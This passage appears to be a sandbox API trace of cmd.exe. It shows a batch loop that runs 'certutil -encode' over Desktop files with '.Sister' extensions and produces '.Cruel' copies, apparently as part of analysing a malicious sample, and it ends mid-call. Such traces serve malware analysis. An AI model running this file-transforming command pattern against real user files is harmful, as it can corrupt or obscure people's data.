_wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0249.599] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0249.599] GetProcessHeap () returned 0x21ed8c70000 [0249.599] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d10) returned 1 [0249.599] GetProcessHeap () returned 0x21ed8c70000 [0249.599] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95ae0 [0249.599] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0249.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.600] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0249.600] _get_osfhandle (_FileHandle=0) returned 0x4c [0249.600] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0249.601] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" \"rcZz1_vwUIy4k7qcs3.mp3.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" \"rcZz1_vwUIy4k7qcs3.mp3.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" \"rcZz1_vwUIy4k7qcs3.mp3.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x100c, dwThreadId=0xee0)) returned 1 [0249.612] CloseHandle (hObject=0xa8) returned 1 [0249.612] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0249.612] GetProcessHeap () returned 0x21ed8c70000 [0249.612] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0249.612] GetEnvironmentStringsW () returned 0x21ed8d44660* [0249.612] GetProcessHeap () returned 0x21ed8c70000 [0249.612] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0249.612] FreeEnvironmentStringsA (penv="=") returned 1 [0249.612] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0249.993] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0249.993] CloseHandle (hObject=0xa4) returned 1 [0249.993] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0249.993] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0249.993] GetProcessHeap () returned 0x21ed8c70000 [0249.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0249.993] GetEnvironmentStringsW () returned 0x21ed8d44660* [0249.993] GetProcessHeap () returned 0x21ed8c70000 [0249.993] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0249.993] FreeEnvironmentStringsA (penv="=") returned 1 [0249.994] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0249.994] GetProcessHeap () returned 0x21ed8c70000 [0249.994] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0249.994] GetEnvironmentStringsW () returned 0x21ed8d44660* [0249.994] GetProcessHeap () returned 0x21ed8c70000 [0249.994] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0249.994] FreeEnvironmentStringsA (penv="=") returned 1 [0249.994] GetProcessHeap () returned 0x21ed8c70000 [0249.994] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95ae0) returned 1 [0249.994] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0249.994] ??_V@YAXPEAX@Z () returned 0x1 [0249.994] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2eb2f0, ftCreationTime.dwHighDateTime=0x1d5ea33, ftLastAccessTime.dwLowDateTime=0x490cc6e0, ftLastAccessTime.dwHighDateTime=0x1d5ed48, ftLastWriteTime.dwLowDateTime=0x490cc6e0, ftLastWriteTime.dwHighDateTime=0x1d5ed48, nFileSizeHigh=0x0, nFileSizeLow=0xe80d, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="rJUrds91A0r_fz.png.Sister", cAlternateFileName="")) returned 1 [0249.994] GetProcessHeap () returned 0x21ed8c70000 [0249.994] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45380, Size=0x4ee) returned 0x21ed8cc8070 [0249.994] GetProcessHeap () returned 0x21ed8c70000 [0249.994] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc8070) returned 0x4ee [0249.995] GetProcessHeap () returned 0x21ed8c70000 [0249.995] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6a1e0 [0249.995] GetProcessHeap () returned 0x21ed8c70000 [0249.995] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a1e0, Size=0x58) returned 0x21ed8d6a1e0 [0249.995] GetProcessHeap () returned 0x21ed8c70000 [0249.995] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6a1e0) returned 0x58 [0249.995] GetProcessHeap () returned 0x21ed8c70000 [0249.995] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6a250 [0249.995] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0249.995] GetProcessHeap () returned 0x21ed8c70000 [0249.995] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8cc7290 [0249.995] ??_V@YAXPEAX@Z () returned 0x1 [0249.995] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0249.995] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cb80 [0249.996] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0249.996] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0249.996] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0249.996] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xbf9404f6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xbf9404f6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7d060 [0249.996] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0249.996] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rJUrds91A0r_fz.png.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2eb2f0, ftCreationTime.dwHighDateTime=0x1d5ea33, ftLastAccessTime.dwLowDateTime=0x490cc6e0, ftLastAccessTime.dwHighDateTime=0x1d5ed48, ftLastWriteTime.dwLowDateTime=0x490cc6e0, ftLastWriteTime.dwHighDateTime=0x1d5ed48, nFileSizeHigh=0x0, nFileSizeLow=0xe80d, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="rJUrds91A0r_fz.png.Sister", cAlternateFileName="RJURDS~1.SIS")) returned 0x21ed8c7ce20 [0249.997] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0249.997] _wcsnicmp (_String1="RJURDS~1.SIS", _String2="rJUrds91A0r_fz.png.Sister", _MaxCount=0x19) returned 69 [0249.997] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0249.997] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0249.997] GetProcessHeap () returned 0x21ed8c70000 [0249.997] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8c10 [0249.997] ??_V@YAXPEAX@Z () returned 0x1 [0249.997] ??_V@YAXPEAX@Z () returned 0x1 [0249.997] GetProcessHeap () returned 0x21ed8c70000 [0249.997] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a250, Size=0x210) returned 0x21ed8d6a250 [0249.997] GetProcessHeap () returned 0x21ed8c70000 [0249.997] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6a250) returned 0x210 [0249.997] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0249.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.997] GetFileType (hFile=0x50) returned 0x2 [0249.997] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.998] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0249.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.998] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0250.005] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0250.005] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0250.005] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0250.005] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0250.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0250.005] GetFileType (hFile=0x50) returned 0x2 [0250.005] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0250.005] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0250.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0250.006] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0250.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0250.006] GetFileType (hFile=0x50) returned 0x2 [0250.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0250.006] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0250.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0250.007] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d6a1f0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d6a1f0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0250.008] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"rJUrds91A0r_fz.png.Sister\" \"rJUrds91A0r_fz.png.Cruel\" ") returned 64 [0250.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0250.008] GetFileType (hFile=0x50) returned 0x2 [0250.008] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0250.008] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0250.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0250.008] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x40) returned 1 [0250.010] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0250.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0250.010] GetFileType (hFile=0x50) returned 0x2 [0250.010] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0250.010] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0250.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0250.010] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0250.015] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0250.016] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0250.016] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0250.016] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0250.016] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0250.016] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0250.016] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0250.016] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0250.016] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0250.016] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0250.016] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0250.016] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0250.016] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0250.016] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0250.016] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0250.016] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0250.016] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0250.017] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0250.017] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0250.017] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0250.017] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0250.017] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0250.017] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0250.017] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0250.017] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0250.017] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0250.017] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0250.017] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0250.017] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0250.017] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0250.017] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0250.017] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0250.017] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0250.017] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0250.017] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0250.017] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0250.017] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0250.017] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0250.017] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0250.017] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0250.017] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0250.017] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0250.018] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0250.018] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0250.018] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0250.019] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0250.019] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0250.019] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0250.019] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0250.020] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0250.020] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0250.020] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0250.020] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0250.020] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0250.020] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0250.020] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0250.020] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0250.020] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0250.020] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0250.020] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0250.020] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0250.020] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0250.020] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0250.020] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0250.020] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0250.020] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0250.020] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0250.021] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0250.021] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0250.021] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0250.021] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0250.021] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0250.021] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0250.021] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0250.021] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0250.021] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0250.021] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0250.021] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0250.021] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0250.021] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0250.021] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0250.021] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0250.021] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0250.021] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0250.021] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0250.022] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0250.022] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0250.022] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0250.022] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0250.022] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0250.022] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0250.022] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0250.022] ??_V@YAXPEAX@Z () returned 0x1 [0250.022] GetProcessHeap () returned 0x21ed8c70000 [0250.022] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9341510 [0250.022] GetProcessHeap () returned 0x21ed8c70000 [0250.022] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa2) returned 0x21ed8d458e0 [0250.023] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0250.023] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0250.023] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0250.023] GetProcessHeap () returned 0x21ed8c70000 [0250.023] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9351500 [0250.024] SetErrorMode (uMode=0x0) returned 0x0 [0250.024] SetErrorMode (uMode=0x1) returned 0x0 [0250.025] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9351510, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0250.025] SetErrorMode (uMode=0x0) returned 0x1 [0250.025] GetProcessHeap () returned 0x21ed8c70000 [0250.025] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9351500, Size=0x52) returned 0x21ed9351500 [0250.025] GetProcessHeap () returned 0x21ed8c70000 [0250.025] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9351500) returned 0x52 [0250.025] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0250.025] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0250.025] GetProcessHeap () returned 0x21ed8c70000 [0250.025] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5f2a0 [0250.025] GetProcessHeap () returned 0x21ed8c70000 [0250.025] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed99807c0 [0250.026] GetProcessHeap () returned 0x21ed8c70000 [0250.026] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed99807c0, Size=0x1be) returned 0x21ed99807c0 [0250.026] GetProcessHeap () returned 0x21ed8c70000 [0250.026] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed99807c0) returned 0x1be [0250.026] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0250.026] GetProcessHeap () returned 0x21ed8c70000 [0250.026] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d45990 [0250.026] GetProcessHeap () returned 0x21ed8c70000 [0250.026] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45990, Size=0x7e) returned 0x21ed8d45990 [0250.026] GetProcessHeap () returned 0x21ed8c70000 [0250.026] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45990) returned 0x7e [0250.026] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0250.027] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0250.027] GetLastError () returned 0x2 [0250.027] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0250.027] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0250.029] GetLastError () returned 0x2 [0250.029] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0250.029] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0250.029] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0250.029] FindFirstFileExW (in: 